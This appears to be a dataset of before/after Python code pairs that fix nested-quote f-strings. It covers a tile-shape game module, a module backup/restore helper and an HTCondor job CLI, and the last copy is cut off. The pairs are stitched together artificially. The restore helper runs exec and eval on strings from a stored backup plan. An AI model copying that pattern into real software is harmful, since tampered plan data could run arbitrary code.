num |= corner
return chr(ord('0') + num)
@classmethod
def from_code(cls, code):
self = cls()
num = ord(code) - ord('0')
for i, corner in reversed(list(enumerate(self.corners))):
self.corners[i] = bool(num & 1)
num >>= 1
self.filled = bool(num & 1)
return self
def encode_thing(thing):
thingset = {pos for pos, tile in thing.items() if tile.filled}
letter = encode_letter(thingset)
tileset = ''.join(thing[x, y].encode() for x in range(4) for y in range(5))
return f'{letter}-{tileset}-{SYMBOLS.get(letter, '')}'
def classify_thing(thing):
shape = frozenset(pos for (pos, tile) in thing.items() if tile.filled)
return encode_letter(shape)
def get_thing_sprite_info(thing_string):
code, tileinfo, comment = thing_string.split('-')
for i, c in enumerate(tileinfo):
if c != '0':
x = i // 5
y = i % 5
yield (x, y, *ThingTile.from_code(c).get_sprite_info())
def get_thing_mesage(encoded):
sym = SYMBOLS.get(encoded)
def cls(*choices):
return choice(list(set((choices))))
usefuls = (
"It doesn't look useful.",
"Probably not too useful here.",
"Probably not too useful.",
"In other words, trash.",
"It doesn't look useful here.",
"You don't know what to do with that.",
"You don't see how it can be useful here.",
)
if sym is None:
ci = cls('a curious', 'an interesting', 'a weird')
useful = cls(*usefuls)
useful_waste = cls(
*usefuls,
"A waste of metal.",
"A waste of material.",
"Frankly, this is a waste of metal.",
)
return cls(
f"That doesn't remind you of anything.\n{useful_waste}",
f"It's… um… modern art?\n{useful_waste}",
f"Doesn't look familiar.\n{useful_waste}",
f"That's {ci} piece of metal.\n{useful}",
f"That's {ci} hunk of metal.\n{useful}",
)
if sym == 'box':
return cls(
f"A roughly rectangular piece of metal.",
) + "\n" + cls(*usefuls)
elif sym == '.':
return cls(
f"A tiny bit of metal.",
) + "\n" + cls(*usefuls)
elif len(sym) == 1:
if sym in string.ascii_uppercase:
letrune = choice(('letter', 'rune'))
message = cls(
f"That is the {letrune} {sym}!",
f"That's the {letrune} {sym}!",
f"It is the {letrune} {sym}!",
f"It's the {letrune} {sym}!",
f"A perfect {letrune} {sym}!",
f"A perfect {sym}!",
f"You made the {letrune} {sym}!",
f"You made a {sym}!",
f"The {letrune} {sym}!",
)
if sym in 'HELP':
message += "\n" + cls(
f"That should get some attention!",
f"Display it!",
f"It will be helpful!",
)
else:
message += "\n" + cls(
*usefuls,
"That's not too interesting.",
"It doesn't look useful.",
)
return message
if sym in string.ascii_lowercase:
sym = sym.upper()
letrune = choice(('letter', 'rune'))
message = cls(
f"That resembles the {letrune} {sym}.",
f"Looks a bit like the {letrune} {sym}.",
f"Someone could read it as the {letrune} {sym}...",
f"It's a bit like the {letrune} {sym}!",
f"It's similar to a {sym}!",
)
if sym in 'HELP':
message += "\n" + cls(
f"That could get some attention.",
f"Try to display it.",
f"It might be helpful!",
)
else:
message += "\n" + cls(
*usefuls,
f"Frankly, a waste of metal.",
)
return message
else:
message = cls(
f"That resembles the symbol {sym}...",
f"It's… the symbol “{sym}”!",
f"Someone could read it as “{sym}”",
f"It's a bit like a “{sym}”.",
f"It's similar to a “{sym}”.",
)
message += "\n" + cls(
*usefuls,
"Frankly, a waste of metal.",
)
return message
elif sym == 'hook':
return cls(
f"A hook!\nMight make the fishing easier.",
f"It's a fish hook!",
f"A hook!\nYou'll use it next time you fish.",
f"A metal fish hook!\nProbably not more effective than your regular ones.",
)
else:
return cls(
f"It's a {sym}.",
f"A {sym}!",
f"It resembles a {sym}.",
f"You made a metal {sym}!",
f"Looks like a {sym}.",
) + "\n" + cls(*usefuls)
| from math import tau
from random import choice
import pkgutil
import string
from .common import change_sprite_image
ROTS = {
(1, 0): 0,
(0, 1): 1,
(-1, 0): 2,
(0, -1): 3,
}
SYMBOLS = {}
text = pkgutil.get_data('mufl', 'text/symbols.txt').decode('utf-8')
for line in text.splitlines():
sym, codes = line.rsplit(maxsplit=1)
for i in range(0, len(codes), 4):
key = codes[i:i+4]
SYMBOLS[key] = sym
def encode_letter(letter):
enc = []
for x in range(4):
num = 0
for y in range(5):
num <<= 1
if (x, y) in letter:
num += 1
enc.append(chr(48+num))
return ''.join(enc)
class ThingTile:
def __init__(self):
self.filled = False
self.corners = [False] * 4
def get_sprite_info(self):
fc = '01'[self.filled]
num_corners = sum(self.corners)
if num_corners == 0:
return f'block_{fc}0000', 0
elif num_corners == 1:
return f'block_{fc}1000', tau/4 * self.corners.index(True)
elif num_corners == 2:
if self.corners == [True, False, True, False]:
return f'block_{fc}1010', 0
elif self.corners == [False, True, False, True]:
return f'block_{fc}1010', tau/4
elif self.corners == [True, False, False, True]:
return f'block_{fc}1100', tau*3/4
else:
return f'block_{fc}1100', tau/4 * self.corners.index(True)
elif num_corners == 3:
return f'block_{fc}1110', tau/4 * (self.corners.index(False) + 2)
else:
return f'block_{fc}1111', 0
def update_sprite(self, sprite):
image, rotation = self.get_sprite_info()
change_sprite_image(sprite, image)
sprite.angle = rotation
def set_wormy_corners(self, d, plus=0):
rot = ROTS[d] + plus
self.set_corner(rot)
self.set_corner(rot-1)
def set_corner(self, c):
self.corners[c%4] = True
def encode(self):
num = int(self.filled)
for corner in self.corners:
num <<= 1
num |= corner
return chr(ord('0') + num)
@classmethod
def from_code(cls, code):
self = cls()
num = ord(code) - ord('0')
for i, corner in reversed(list(enumerate(self.corners))):
self.corners[i] = bool(num & 1)
num >>= 1
self.filled = bool(num & 1)
return self
def encode_thing(thing):
thingset = {pos for pos, tile in thing.items() if tile.filled}
letter = encode_letter(thingset)
tileset = ''.join(thing[x, y].encode() for x in range(4) for y in range(5))
return f'{letter}-{tileset}-{SYMBOLS.get(letter, "")}'
def classify_thing(thing):
shape = frozenset(pos for (pos, tile) in thing.items() if tile.filled)
return encode_letter(shape)
def get_thing_sprite_info(thing_string):
code, tileinfo, comment = thing_string.split('-')
for i, c in enumerate(tileinfo):
if c != '0':
x = i // 5
y = i % 5
yield (x, y, *ThingTile.from_code(c).get_sprite_info())
def get_thing_mesage(encoded):
sym = SYMBOLS.get(encoded)
def cls(*choices):
return choice(list(set((choices))))
usefuls = (
"It doesn't look useful.",
"Probably not too useful here.",
"Probably not too useful.",
"In other words, trash.",
"It doesn't look useful here.",
"You don't know what to do with that.",
"You don't see how it can be useful here.",
)
if sym is None:
ci = cls('a curious', 'an interesting', 'a weird')
useful = cls(*usefuls)
useful_waste = cls(
*usefuls,
"A waste of metal.",
"A waste of material.",
"Frankly, this is a waste of metal.",
)
return cls(
f"That doesn't remind you of anything.\n{useful_waste}",
f"It's… um… modern art?\n{useful_waste}",
f"Doesn't look familiar.\n{useful_waste}",
f"That's {ci} piece of metal.\n{useful}",
f"That's {ci} hunk of metal.\n{useful}",
)
if sym == 'box':
return cls(
f"A roughly rectangular piece of metal.",
) + "\n" + cls(*usefuls)
elif sym == '.':
return cls(
f"A tiny bit of metal.",
) + "\n" + cls(*usefuls)
elif len(sym) == 1:
if sym in string.ascii_uppercase:
letrune = choice(('letter', 'rune'))
message = cls(
f"That is the {letrune} {sym}!",
f"That's the {letrune} {sym}!",
f"It is the {letrune} {sym}!",
f"It's the {letrune} {sym}!",
f"A perfect {letrune} {sym}!",
f"A perfect {sym}!",
f"You made the {letrune} {sym}!",
f"You made a {sym}!",
f"The {letrune} {sym}!",
)
if sym in 'HELP':
message += "\n" + cls(
f"That should get some attention!",
f"Display it!",
f"It will be helpful!",
)
else:
message += "\n" + cls(
*usefuls,
"That's not too interesting.",
"It doesn't look useful.",
)
return message
if sym in string.ascii_lowercase:
sym = sym.upper()
letrune = choice(('letter', 'rune'))
message = cls(
f"That resembles the {letrune} {sym}.",
f"Looks a bit like the {letrune} {sym}.",
f"Someone could read it as the {letrune} {sym}...",
f"It's a bit like the {letrune} {sym}!",
f"It's similar to a {sym}!",
)
if sym in 'HELP':
message += "\n" + cls(
f"That could get some attention.",
f"Try to display it.",
f"It might be helpful!",
)
else:
message += "\n" + cls(
*usefuls,
f"Frankly, a waste of metal.",
)
return message
else:
message = cls(
f"That resembles the symbol {sym}...",
f"It's… the symbol “{sym}”!",
f"Someone could read it as “{sym}”",
f"It's a bit like a “{sym}”.",
f"It's similar to a “{sym}”.",
)
message += "\n" + cls(
*usefuls,
"Frankly, a waste of metal.",
)
return message
elif sym == 'hook':
return cls(
f"A hook!\nMight make the fishing easier.",
f"It's a fish hook!",
f"A hook!\nYou'll use it next time you fish.",
f"A metal fish hook!\nProbably not more effective than your regular ones.",
)
else:
return cls(
f"It's a {sym}.",
f"A {sym}!",
f"It resembles a {sym}.",
f"You made a metal {sym}!",
f"Looks like a {sym}.",
) + "\n" + cls(*usefuls)
|
import os
import sys
from types import ModuleType
from .module_loading import load_module
# we assume that our code is always run from the root dir of this repo and nobody tampers with the python path
# we use this to determine whether we should make a backup of the file of a class or not, because if it is from
# our code base it might contain breaking changes in the future
code_root_path = sys.path[0]
def get_import_info(chain):
backup_info = get_backup_info(get_module(chain), chain)
return {
"import_string": f"from {backup_info["module_path"]} import {backup_info["class_name"]}",
"class_name": backup_info['class_name'],
}
def generate_backup_plan(chain):
# TODO: does not work yet, if child has children that need to be backed up...
# maximum of one level is allowed right now
plan = {
"root_object": get_backup_info(get_module(chain), chain),
"children": generate_child_backup_plan(chain),
}
return remove_duplicates_from_backup_plan(plan)
def generate_child_backup_plan(parent):
children_to_backup = []
for child in parent.children():
child_module = get_module(child)
# flag this module as necessary for update only if it is in our code base
if code_root_path in child_module.__file__:
children_to_backup.append(get_backup_info(child_module, child))
children_to_backup.extend(generate_child_backup_plan(child))
return children_to_backup
def get_backup_info(module, obj):
return {
"module_path": module.__name__,
"class_name": obj.__class__.__name__,
"files": (get_definition_filepath(obj), get_definition_filename(obj))
}
def remove_duplicates_from_backup_plan(plan):
unique_children = []
module_paths = [plan['root_object']['module_path']]
for child in plan['children']:
if child['module_path'] in module_paths:
continue
module_paths.append(child['module_path'])
unique_children.append(child)
plan['children'] = unique_children
return plan
def get_module(obj):
return __import__(obj.__module__, fromlist=obj.__module__.split('.')[:-1])
def get_definition_filepath(obj):
return get_module(obj).__file__
def get_definition_filename(obj):
return os.path.basename(get_definition_filepath(obj))
def restore_backup(backup_plan, backup_dir):
if 'import_string' in backup_plan:
exec(backup_plan['import_string'])
klass = eval(backup_plan['class_name'])
return klass
# 1. load root module with network definition
root_module = load_module(os.path.abspath(os.path.join(backup_dir, backup_plan['root_object']["files"][1])))
# 2. adapt pointers to other modules that we created a backup of
for child in backup_plan['children']:
child_module = load_module(
os.path.abspath(os.path.join(backup_dir, child['files'][1])),
module_path=child['module_path']
)
for name in filter(lambda x: not x.startswith('_'), dir(root_module)):
module_attr = getattr(root_module, name)
if isinstance(module_attr, ModuleType) or module_attr.__module__ != child['module_path']:
# if the attr we grabbed from the module is itself a module (so make sure to import everything directly!!)
# or if the module path does not fit to the path we saved we have a look at the next attr
continue
if module_attr.__name__ != child['class_name']:
# we do not have the correct class right now
continue
setattr(root_module, name, getattr(child_module, child['class_name']))
break
return getattr(root_module, backup_plan['root_object']['class_name'])
| import os
import sys
from types import ModuleType
from .module_loading import load_module
# we assume that our code is always run from the root dir of this repo and nobody tampers with the python path
# we use this to determine whether we should make a backup of the file of a class or not, because if it is from
# our code base it might contain breaking changes in the future
code_root_path = sys.path[0]
def get_import_info(chain):
backup_info = get_backup_info(get_module(chain), chain)
return {
"import_string": f"from {backup_info['module_path']} import {backup_info['class_name']}",
"class_name": backup_info['class_name'],
}
def generate_backup_plan(chain):
# TODO: does not work yet, if child has children that need to be backed up...
# maximum of one level is allowed right now
plan = {
"root_object": get_backup_info(get_module(chain), chain),
"children": generate_child_backup_plan(chain),
}
return remove_duplicates_from_backup_plan(plan)
def generate_child_backup_plan(parent):
children_to_backup = []
for child in parent.children():
child_module = get_module(child)
# flag this module as necessary for update only if it is in our code base
if code_root_path in child_module.__file__:
children_to_backup.append(get_backup_info(child_module, child))
children_to_backup.extend(generate_child_backup_plan(child))
return children_to_backup
def get_backup_info(module, obj):
return {
"module_path": module.__name__,
"class_name": obj.__class__.__name__,
"files": (get_definition_filepath(obj), get_definition_filename(obj))
}
def remove_duplicates_from_backup_plan(plan):
unique_children = []
module_paths = [plan['root_object']['module_path']]
for child in plan['children']:
if child['module_path'] in module_paths:
continue
module_paths.append(child['module_path'])
unique_children.append(child)
plan['children'] = unique_children
return plan
def get_module(obj):
return __import__(obj.__module__, fromlist=obj.__module__.split('.')[:-1])
def get_definition_filepath(obj):
return get_module(obj).__file__
def get_definition_filename(obj):
return os.path.basename(get_definition_filepath(obj))
def restore_backup(backup_plan, backup_dir):
if 'import_string' in backup_plan:
exec(backup_plan['import_string'])
klass = eval(backup_plan['class_name'])
return klass
# 1. load root module with network definition
root_module = load_module(os.path.abspath(os.path.join(backup_dir, backup_plan['root_object']["files"][1])))
# 2. adapt pointers to other modules that we created a backup of
for child in backup_plan['children']:
child_module = load_module(
os.path.abspath(os.path.join(backup_dir, child['files'][1])),
module_path=child['module_path']
)
for name in filter(lambda x: not x.startswith('_'), dir(root_module)):
module_attr = getattr(root_module, name)
if isinstance(module_attr, ModuleType) or module_attr.__module__ != child['module_path']:
# if the attr we grabbed from the module is itself a module (so make sure to import everything directly!!)
# or if the module path does not fit to the path we saved we have a look at the next attr
continue
if module_attr.__name__ != child['class_name']:
# we do not have the correct class right now
continue
setattr(root_module, name, getattr(child_module, child['class_name']))
break
return getattr(root_module, backup_plan['root_object']['class_name'])
|
import htcondor
import os
import shutil
import subprocess
import sys
from datetime import datetime, timedelta
from pathlib import Path
from .conf import *
from .dagman import DAGMan
# Must be consistent with job status definitions in src/condor_includes/proc.h
JobStatus = [
"NONE",
"IDLE",
"RUNNING",
"REMOVED",
"COMPLETED",
"HELD",
"TRANSFERRING_OUTPUT",
"SUSPENDED",
"JOB_STATUS_MAX"
]
schedd = htcondor.Schedd()
class Job:
"""
A :class:`Job` holds all operations related to HTCondor jobs
"""
@staticmethod
def submit(file, options=None):
# Make sure the specified submit file exists and is readable!
if os.access(file, os.R_OK) is False:
print(f"Error: could not read file {file}")
sys.exit(1)
# If no resource specified, submit job to the local schedd
if "resource" not in options:
with open(file, "r") as submit_file:
submit_data = submit_file.read()
submit_description = htcondor.Submit(submit_data)
# The Job class can only submit a single job at a time
submit_qargs = submit_description.getQArgs()
if submit_qargs != "" and submit_qargs != "1":
print("Error: can only submit one job at a time")
sys.exit(1)
with schedd.transaction() as txn:
try:
cluster_id = submit_description.queue(txn, 1)
print(f"Job {cluster_id} was submitted.")
except Exception as error:
print(f"Error submitting job: {error}")
sys.exit(1)
elif options["resource"] == "slurm":
if "runtime" not in options:
print("Error: Slurm resources must specify a --runtime argument")
sys.exit(1)
# Verify that we have Slurm access; if not, run bosco_clutser to create it
try:
subprocess.check_output(["bosco_cluster", "--status", "hpclogin1.chtc.wisc.edu"])
except Exception:
print(f"You need to install support software to access the Slurm cluster. Please run the following command in your terminal:\n\nbosco_cluster --add hpclogin1.chtc.wisc.edu slurm\n")
sys.exit(1)
Path(TMP_DIR).mkdir(parents=True, exist_ok=True)
DAGMan.write_slurm_dag(file, options["runtime"], options["email"])
os.chdir(TMP_DIR) # DAG must be submitted from TMP_DIR
submit_description = htcondor.Submit.from_dag(str(TMP_DIR / "slurm_submit.dag"))
submit_description["+ResourceType"] = "\"Slurm\""
# The Job class can only submit a single job at a time
submit_qargs = submit_description.getQArgs()
if submit_qargs != "" and submit_qargs != "1":
print("Error: can only submit one job at a time. See the job-set syntax for submitting multiple jobs.")
sys.exit(1)
with schedd.transaction() as txn:
try:
cluster_id = submit_description.queue(txn, 1)
print(f"Job {cluster_id} was submitted.")
except Exception as error:
print(f"Error submitting job: f{error}")
sys.exit(1)
elif options["resource"] == "ec2":
if "runtime" not in options:
print("Error: EC2 resources must specify a --runtime argument")
sys.exit(1)
Path(TMP_DIR).mkdir(parents=True, exist_ok=True)
DAGMan.write_ec2_dag(file, options["runtime"], options["email"])
os.chdir(TMP_DIR) # DAG must be submitted from TMP_DIR
submit_description = htcondor.Submit.from_dag("ec2_submit.dag")
submit_description["+ResourceType"] = "\"EC2\""
# The Job class can only submit a single job at a time
submit_qargs = submit_description.getQArgs()
if submit_qargs != "" and submit_qargs != "1":
print("Error: can only submit one job at a time. See the job-set syntax for submitting multiple jobs.")
sys.exit(1)
with schedd.transaction() as txn:
try:
cluster_id = submit_description.queue(txn, 1)
print(f"Job {cluster_id} was submitted.")
except Exception as error:
print(f"Error submitting job: f{error}")
sys.exit(1)
@staticmethod
def status(id, options=None):
"""
Displays the status of a job
"""
job = None
job_status = "IDLE"
resource_type = "htcondor"
try:
job = schedd.query(
constraint=f"ClusterId == {id}",
projection=["JobStartDate", "JobStatus", "LastVacateTime", "ResourceType"]
)
except IndexError:
print(f"No job found for ID {id}.")
sys.exit(0)
except Exception as err:
print(f"Error looking up job status: {err}")
sys.exit(1)
if len(job) == 0:
print(f"No job found for ID {id}.")
sys.exit(0)
if "ResourceType" in job[0]:
resource_type = job[0]["ResourceType"].lower()
# Now, produce job status based on the resource type
if resource_type == "htcondor":
if JobStatus[job[0]['JobStatus']] == "RUNNING":
job_running_time = datetime.now() - datetime.fromtimestamp(job[0]["JobStartDate"])
print(f"Job is running since {round(job_running_time.seconds/3600)}h{round(job_running_time.seconds/60)}m{(job_running_time.seconds%60)}s")
elif JobStatus[job[0]['JobStatus']] == "HELD":
job_held_time = datetime.now() - datetime.fromtimestamp(job[0]["LastVacateTime"])
print(f"Job is held since {round(job_held_time.seconds/3600)}h{round(job_held_time.seconds/60)}m{(job_held_time.seconds%60)}s")
elif JobStatus[job[0]['JobStatus']] == "COMPLETED":
print("Job has completed")
else:
print(f"Job is {JobStatus[job[0]["JobStatus"]]}")
# Jobs running on provisioned Slurm or EC2 resources need to retrieve
# additional information from the provisioning DAGMan log
elif resource_type == "slurm" or resource_type == "ec2":
# Variables specific to jobs running on Slurm clusters
jobs_running = 0
job_started_time = None
provisioner_cluster_id = None
provisioner_job_submitted_time = None
slurm_cluster_id = None
slurm_nodes_requested = None
slurm_runtime = None
dagman_dag, dagman_out, dagman_log = DAGMan.get_files(id)
if dagman_dag is None:
print(f"No {resource_type} job found for ID {id}.")
sys.exit(0)
# Parse the .dag file to retrieve some user input values
with open(dagman_dag, "r") as dagman_dag_file:
for line in dagman_dag_file.readlines():
if "annex_runtime =" in line:
slurm_runtime = int(line.split("=")[1].strip())
# Parse the DAGMan event log for useful information
dagman_events = htcondor.JobEventLog(dagman_log)
for event in dagman_events.events(0):
if "LogNotes" in event.keys() and event["LogNotes"] == "DAG Node: B":
provisioner_cluster_id = event.cluster
provisioner_job_submitted_time = datetime.fromtimestamp(event.timestamp)
job_status = "PROVISIONING REQUEST PENDING"
elif "LogNotes" in event.keys() and event["LogNotes"] == "DAG Node: C":
slurm_cluster_id = event.cluster
elif event.cluster == slurm_cluster_id and event.type == htcondor.JobEventType.EXECUTE:
job_status = "RUNNING"
jobs_running += 1
if job_started_time is None:
job_started_time = datetime.fromtimestamp(event.timestamp)
elif event.cluster == slurm_cluster_id and event.type == htcondor.JobEventType.JOB_TERMINATED:
jobs_running -= 1
if jobs_running == 0:
job_status = "COMPLETE"
elif event.type == htcondor.JobEventType.JOB_HELD or event.type == htcondor.JobEventType.EXECUTABLE_ERROR:
job_status = "ERROR"
# Calculate how long job has been in its current state
current_time = datetime.now()
time_diff = None
if job_status == "PROVISIONING REQUEST PENDING":
time_diff = current_time - provisioner_job_submitted_time
elif job_status == "RUNNING":
time_diff = current_time - job_started_time
# Now that we have all the information we want, display it
if job_status == "COMPLETED":
print("Job has completed")
else:
if job_status == "PROVISIONING REQUEST PENDING":
print(f"Job is waiting for {resource_type.upper()} to provision pending request", end='')
else:
print(f"Job is {job_status}", end='')
if time_diff is not None:
print(f" since {round(time_diff.seconds/60)}m{(time_diff.seconds%60)}s")
else:
print("")
else:
print(f"Error: The 'job status' command does not support {resource_type} resources.")
sys.exit(1)
@staticmethod
def resources(id, options=None):
"""
Displays the resources used by a specified job
"""
# If no resource specified, assume job is running on local pool
if "resource" not in options:
try:
job = schedd.query(
constraint=f"ClusterId == {id}",
projection=["RemoteHost"]
)
except IndexError:
print(f"No jobs found for ID {id}.")
sys.exit(0)
except:
print(f"Unable to look up job resources")
sys.exit(1)
if len(job) == 0:
print(f"No jobs found for ID {id}.")
sys.exit(0)
# TODO: Make this work correctly for jobs that havne't started running yet
job_host = job[0]["RemoteHost"]
print(f"Job is using resource {job_host}")
# Jobs running on provisioned Slurm resources need to retrieve
# additional information from the provisioning DAGMan log
elif options["resource"] == "slurm":
# Internal variables
dagman_cluster_id = None
provisioner_cluster_id = None
slurm_cluster_id = None
# User-facing variables (all values set below are default/initial state)
provisioner_job_submitted_time = None
provisioner_job_scheduled_end_time = None
job_status = "NOT SUBMITTED"
job_started_time = None
jobs_running = 0
slurm_nodes_requested = None
slurm_runtime = None
dagman_dag, dagman_out, dagman_log = DAGMan.get_files(id)
if dagman_dag is None:
print(f"No Slurm job found for ID {id}.")
sys.exit(0)
# Parse the .dag file to retrieve some user input values
with open(dagman_dag, "r") as dagman_dag_file:
for line in dagman_dag_file.readlines():
if "annex_runtime =" in line:
slurm_runtime = int(line.split("=")[1].strip())
# Parse the DAGMan event log for useful information
dagman_events = htcondor.JobEventLog(dagman_log)
for event in dagman_events.events(0):
if "LogNotes" in event.keys() and event["LogNotes"] == "DAG Node: B":
provisioner_cluster_id = event.cluster
provisioner_job_submitted_time = datetime.fromtimestamp(event.timestamp)
provisioner_job_scheduled_end_time = datetime.fromtimestamp(event.timestamp + slurm_runtime)
job_status = "PROVISIONING REQUEST PENDING"
if event.cluster == provisioner_cluster_id and event.type == htcondor.JobEventType.EXECUTE:
provisioner_job_started_time = datetime.fromtimestamp(event.timestamp)
provisioner_job_scheduled_end_time = datetime.fromtimestamp(event.timestamp + slurm_runtime)
if "LogNotes" in event.keys() and event["LogNotes"] == "DAG Node: C":
slurm_cluster_id = event.cluster
job_started_time = datetime.fromtimestamp(event.timestamp)
if event.cluster == slurm_cluster_id and event.type == htcondor.JobEventType.EXECUTE:
job_status = "RUNNING"
jobs_running += 1
if event.cluster == slurm_cluster_id and (event.type == htcondor.JobEventType.JOB_TERMINATED or event.type == htcondor.JobEventType.JOB_EVICTED):
jobs_running -= 1
if jobs_running == 0:
job_status = "COMPLETE"
if event.type == htcondor.JobEventType.JOB_HELD or event.type == htcondor.JobEventType.EXECUTABLE_ERROR:
job_status = "ERROR"
# Now that we have all the information we want, display it
if job_status == "PROVISIONING REQUEST PENDING":
print(f"Job is still waiting for {slurm_nodes_requested} Slurm nodes to provision")
elif job_status == "RUNNING":
print(f"Job is running on {jobs_running}/{slurm_nodes_requested} requested Slurm nodes")
elif job_status == "ERROR":
print(f"An error occurred provisioning Slurm resources")
# Show information about time remaining
if job_status == "RUNNING" or job_status == "COMPLETE":
current_time = datetime.now()
if current_time < provisioner_job_scheduled_end_time:
time_diff = provisioner_job_scheduled_end_time - current_time
print(f"Slurm resources are reserved for another {round(time_diff.seconds/60)}m{(time_diff.seconds%60)}s")
else:
time_diff = current_time - provisioner_job_scheduled_end_time
print(f"Slurm resources were terminated since {round(time_diff.seconds/60)}m{(time_diff.seconds%60)}s")
| import htcondor
import os
import shutil
import subprocess
import sys
from datetime import datetime, timedelta
from pathlib import Path
from .conf import *
from .dagman import DAGMan
# Must be consistent with job status definitions in src/condor_includes/proc.h
JobStatus = [
"NONE",
"IDLE",
"RUNNING",
"REMOVED",
"COMPLETED",
"HELD",
"TRANSFERRING_OUTPUT",
"SUSPENDED",
"JOB_STATUS_MAX"
]
schedd = htcondor.Schedd()
class Job:
"""
A :class:`Job` holds all operations related to HTCondor jobs
"""
@staticmethod
def submit(file, options=None):
# Make sure the specified submit file exists and is readable!
if os.access(file, os.R_OK) is False:
print(f"Error: could not read file {file}")
sys.exit(1)
# If no resource specified, submit job to the local schedd
if "resource" not in options:
with open(file, "r") as submit_file:
submit_data = submit_file.read()
submit_description = htcondor.Submit(submit_data)
# The Job class can only submit a single job at a time
submit_qargs = submit_description.getQArgs()
if submit_qargs != "" and submit_qargs != "1":
print("Error: can only submit one job at a time")
sys.exit(1)
with schedd.transaction() as txn:
try:
cluster_id = submit_description.queue(txn, 1)
print(f"Job {cluster_id} was submitted.")
except Exception as error:
print(f"Error submitting job: {error}")
sys.exit(1)
elif options["resource"] == "slurm":
if "runtime" not in options:
print("Error: Slurm resources must specify a --runtime argument")
sys.exit(1)
# Verify that we have Slurm access; if not, run bosco_clutser to create it
try:
subprocess.check_output(["bosco_cluster", "--status", "hpclogin1.chtc.wisc.edu"])
except Exception:
print(f"You need to install support software to access the Slurm cluster. Please run the following command in your terminal:\n\nbosco_cluster --add hpclogin1.chtc.wisc.edu slurm\n")
sys.exit(1)
Path(TMP_DIR).mkdir(parents=True, exist_ok=True)
DAGMan.write_slurm_dag(file, options["runtime"], options["email"])
os.chdir(TMP_DIR) # DAG must be submitted from TMP_DIR
submit_description = htcondor.Submit.from_dag(str(TMP_DIR / "slurm_submit.dag"))
submit_description["+ResourceType"] = "\"Slurm\""
# The Job class can only submit a single job at a time
submit_qargs = submit_description.getQArgs()
if submit_qargs != "" and submit_qargs != "1":
print("Error: can only submit one job at a time. See the job-set syntax for submitting multiple jobs.")
sys.exit(1)
with schedd.transaction() as txn:
try:
cluster_id = submit_description.queue(txn, 1)
print(f"Job {cluster_id} was submitted.")
except Exception as error:
print(f"Error submitting job: f{error}")
sys.exit(1)
elif options["resource"] == "ec2":
if "runtime" not in options:
print("Error: EC2 resources must specify a --runtime argument")
sys.exit(1)
Path(TMP_DIR).mkdir(parents=True, exist_ok=True)
DAGMan.write_ec2_dag(file, options["runtime"], options["email"])
os.chdir(TMP_DIR) # DAG must be submitted from TMP_DIR
submit_description = htcondor.Submit.from_dag("ec2_submit.dag")
submit_description["+ResourceType"] = "\"EC2\""
# The Job class can only submit a single job at a time
submit_qargs = submit_description.getQArgs()
if submit_qargs != "" and submit_qargs != "1":
print("Error: can only submit one job at a time. See the job-set syntax for submitting multiple jobs.")
sys.exit(1)
with schedd.transaction() as txn:
try:
cluster_id = submit_description.queue(txn, 1)
print(f"Job {cluster_id} was submitted.")
except Exception as error:
print(f"Error submitting job: f{error}")
sys.exit(1)
@staticmethod
def status(id, options=None):
"""
Displays the status of a job
"""
job = None
job_status = "IDLE"
resource_type = "htcondor"
try:
job = schedd.query(
constraint=f"ClusterId == {id}",
projection=["JobStartDate", "JobStatus", "LastVacateTime", "ResourceType"]
)
except IndexError:
print(f"No job found for ID {id}.")
sys.exit(0)
except Exception as err:
print(f"Error looking up job status: {err}")
sys.exit(1)
if len(job) == 0:
print(f"No job found for ID {id}.")
sys.exit(0)
if "ResourceType" in job[0]:
resource_type = job[0]["ResourceType"].lower()
# Now, produce job status based on the resource type
if resource_type == "htcondor":
if JobStatus[job[0]['JobStatus']] == "RUNNING":
job_running_time = datetime.now() - datetime.fromtimestamp(job[0]["JobStartDate"])
print(f"Job is running since {round(job_running_time.seconds/3600)}h{round(job_running_time.seconds/60)}m{(job_running_time.seconds%60)}s")
elif JobStatus[job[0]['JobStatus']] == "HELD":
job_held_time = datetime.now() - datetime.fromtimestamp(job[0]["LastVacateTime"])
print(f"Job is held since {round(job_held_time.seconds/3600)}h{round(job_held_time.seconds/60)}m{(job_held_time.seconds%60)}s")
elif JobStatus[job[0]['JobStatus']] == "COMPLETED":
print("Job has completed")
else:
print(f"Job is {JobStatus[job[0]['JobStatus']]}")
# Jobs running on provisioned Slurm or EC2 resources need to retrieve
# additional information from the provisioning DAGMan log
elif resource_type == "slurm" or resource_type == "ec2":
# Variables specific to jobs running on Slurm clusters
jobs_running = 0
job_started_time = None
provisioner_cluster_id = None
provisioner_job_submitted_time = None
slurm_cluster_id = None
slurm_nodes_requested = None
slurm_runtime = None
dagman_dag, dagman_out, dagman_log = DAGMan.get_files(id)
if dagman_dag is None:
print(f"No {resource_type} job found for ID {id}.")
sys.exit(0)
# Parse the .dag file to retrieve some user input values
with open(dagman_dag, "r") as dagman_dag_file:
for line in dagman_dag_file.readlines():
if "annex_runtime =" in line:
slurm_runtime = int(line.split("=")[1].strip())
# Parse the DAGMan event log for useful information
dagman_events = htcondor.JobEventLog(dagman_log)
for event in dagman_events.events(0):
if "LogNotes" in event.keys() and event["LogNotes"] == "DAG Node: B":
provisioner_cluster_id = event.cluster
provisioner_job_submitted_time = datetime.fromtimestamp(event.timestamp)
job_status = "PROVISIONING REQUEST PENDING"
elif "LogNotes" in event.keys() and event["LogNotes"] == "DAG Node: C":
slurm_cluster_id = event.cluster
elif event.cluster == slurm_cluster_id and event.type == htcondor.JobEventType.EXECUTE:
job_status = "RUNNING"
jobs_running += 1
if job_started_time is None:
job_started_time = datetime.fromtimestamp(event.timestamp)
elif event.cluster == slurm_cluster_id and event.type == htcondor.JobEventType.JOB_TERMINATED:
jobs_running -= 1
if jobs_running == 0:
job_status = "COMPLETE"
elif event.type == htcondor.JobEventType.JOB_HELD or event.type == htcondor.JobEventType.EXECUTABLE_ERROR:
job_status = "ERROR"
# Calculate how long job has been in its current state
current_time = datetime.now()
time_diff = None
if job_status == "PROVISIONING REQUEST PENDING":
time_diff = current_time - provisioner_job_submitted_time
elif job_status == "RUNNING":
time_diff = current_time - job_started_time
# Now that we have all the information we want, display it
if job_status == "COMPLETED":
print("Job has completed")
else:
if job_status == "PROVISIONING REQUEST PENDING":
print(f"Job is waiting for {resource_type.upper()} to provision pending request", end='')
else:
print(f"Job is {job_status}", end='')
if time_diff is not None:
print(f" since {round(time_diff.seconds/60)}m{(time_diff.seconds%60)}s")
else:
print("")
else:
print(f"Error: The 'job status' command does not support {resource_type} resources.")
sys.exit(1)
@staticmethod
def resources(id, options=None):
"""
Displays the resources used by a specified job
"""
# If no resource specified, assume job is running on local pool
if "resource" not in options:
try:
job = schedd.query(
